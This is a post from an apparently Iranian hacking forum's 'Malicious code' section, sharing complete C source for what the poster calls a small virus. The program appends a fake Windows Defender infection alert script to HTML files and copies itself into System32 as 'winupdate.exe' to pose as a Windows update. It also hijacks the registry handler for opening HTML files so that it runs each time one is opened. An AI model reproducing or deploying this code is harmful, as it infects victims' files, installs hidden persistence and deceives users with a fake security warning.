Parsi Coders
C virus - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: Malicious code (http://parsicoders.com/forumdisplay.php?fid=62)
+---- موضوع: C virus (/showthread.php?tid=912)



C virus - Amin_Mansouri - 09-22-2011

اینم یه ویروس کوچلو با زبان سی :-)
کد:
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <shellapi.h>

// (Default) "C:\Program Files\Internet Explorer\iexplore.exe" %1
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";

int main(int argc, char *argv[])
{
// needed path to program
    if(argc==2) {
// set up attributes for normal
        SetFileAttributes(argv[1],FILE_ATTRIBUTE_NORMAL);
// open file
        FILE *file = fopen(argv[1],"at");
// write to it (string        InfectString)
fputs(InfectString,file);
// close file
        fclose(file);
//run internet explorer
        ShellExecute(NULL,"open","\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"",argv[1],NULL,SW_SHOW);
    }

    char MyPath[256], CpyPath[256];
// get path to our trojan
    GetModuleFileName(NULL,MyPath,sizeof(MyPath));
// get C:\Windows\System32
    GetSystemDirectory(CpyPath,sizeof(CpyPath));
// Add to string system32 our trojan reccord C:\Windows\System32\winupdate.exe
    strcat(CpyPath,"\\winupdate.exe");
// copy trojan to C:\Windows\System32\ our winupdate.exe
    CopyFile(MyPath,CpyPath,FALSE);
// add to string 1% for open with shell extension
    strcat(CpyPath," %1");

    HKEY Key32;//for registru
// open key in registry
    RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
// write our record
    RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
    
// close registry
RegCloseKey(Key32);

//end
    return 0;
}